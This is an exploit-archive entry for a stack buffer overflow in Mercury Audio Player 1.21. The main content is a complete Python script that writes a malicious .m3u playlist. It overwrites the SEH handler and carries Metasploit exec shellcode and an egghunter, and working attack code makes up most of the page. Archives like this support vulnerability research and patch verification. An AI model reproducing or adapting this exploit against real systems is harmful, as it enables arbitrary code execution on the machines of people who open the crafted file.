Mercury Audio Player 1.21 (.m3u) Seh Overwrite Exploit

vendor:

Mercury Audio Player

by:

His0k4

7,6

CVSS

HIGH

Seh Overwrite Exploit

119

CWE

Product Name: Mercury Audio Player

Affected Version From: 1.21

Affected Version To: 1.21

Patch Exists: YES

Related CWE: N/A

CPE: a:mercury_audio_player:mercury_audio_player:1.21

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2008

Mercury Audio Player 1.21 (.m3u) Seh Overwrite Exploit

This exploit is for Mercury Audio Player 1.21 (.m3u) Seh Overwrite Exploit. It is a buffer overflow exploit which overwrites the SEH handler with a pointer to a shellcode. The exploit code is written by His0k4 and was tested on Windows XP Pro SP3 (EN). It was published on milw0rm.com in 2008.

Mitigation:

The user should update to the latest version of Mercury Audio Player to patch this vulnerability.

Source

Exploit-DB raw data:

#usage: exploit.py
#Note : Exploit take about 30 seconds to work.
print "**************************************************************************"
print " Mercury Audio Player 1.21 (.m3u) Seh Overwrite Exploit\n"
print " Refer: http://www.milw0rm.com/exploits/8578"
print " Exploit code: His0k4"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " greetz: TO ELITE ALGERIANS (TixxDZ),snakespc.com\n"
print "**************************************************************************"

         	
buff = "\x41" * 16740
next_seh = "\xEB\x06\x41\x42"
seh = "\xB8\x15\xD1\x72" #msacm32.drv


# win32_exec -  EXITFUNC=seh CMD=calc Size=158 Encoder=PexFnstenvMov http://metasploit.com
shellcode = (
"DZ27DZ27"+"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x22\xd1\xdc"
"\x59\x83\xeb\xfc\xe2\xf4\xde\x39\x98\x59\x22\xd1\x57\x1c\x1e\x5a"
"\xa0\x5c\x5a\xd0\x33\xd2\x6d\xc9\x57\x06\x02\xd0\x37\x10\xa9\xe5"
"\x57\x58\xcc\xe0\x1c\xc0\x8e\x55\x1c\x2d\x25\x10\x16\x54\x23\x13"
"\x37\xad\x19\x85\xf8\x5d\x57\x34\x57\x06\x06\xd0\x37\x3f\xa9\xdd"
"\x97\xd2\x7d\xcd\xdd\xb2\xa9\xcd\x57\x58\xc9\x58\x80\x7d\x26\x12"
"\xed\x99\x46\x5a\x9c\x69\xa7\x11\xa4\x55\xa9\x91\xd0\xd2\x52\xcd"
"\x71\xd2\x4a\xd9\x37\x50\xa9\x51\x6c\x59\x22\xd1\x57\x31\x1e\x8e"
"\xed\xaf\x42\x87\x55\xa1\xa1\x11\xa7\x09\x4a\x21\x56\x5d\x7d\xb9"
"\x44\xa7\xa8\xdf\x8b\xa6\xc5\xb2\xbd\x35\x41\xd1\xdc\x59")

#[*] x86/alpha_mixed succeeded with size 126 (iteration=1)
egghunter=(
"\x89\xe5\xda\xd9\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x45\x36\x4d\x51\x48\x4a\x4b\x4f\x44\x4f\x51\x52\x46\x32\x42"
"\x4a\x45\x52\x46\x38\x48\x4d\x46\x4e\x47\x4c\x45\x55\x51\x4a"
"\x44\x34\x4a\x4f\x48\x38\x47\x34\x50\x5a\x50\x32\x50\x37\x4c"
"\x4b\x4b\x4a\x4e\x4f\x43\x45\x4b\x5a\x4e\x4f\x42\x55\x4b\x57"
"\x4b\x4f\x4d\x37\x41\x41")

exploit = buff + shellcode + next_seh + seh + egghunter + "\x90"*7

try:
    out_file = open("exploit.m3u",'w')
    out_file.write(exploit+".mp3")
    out_file.close()
    raw_input("\nExploit file created!\n")
except:
    print "Error"

# milw0rm.com [2009-05-01]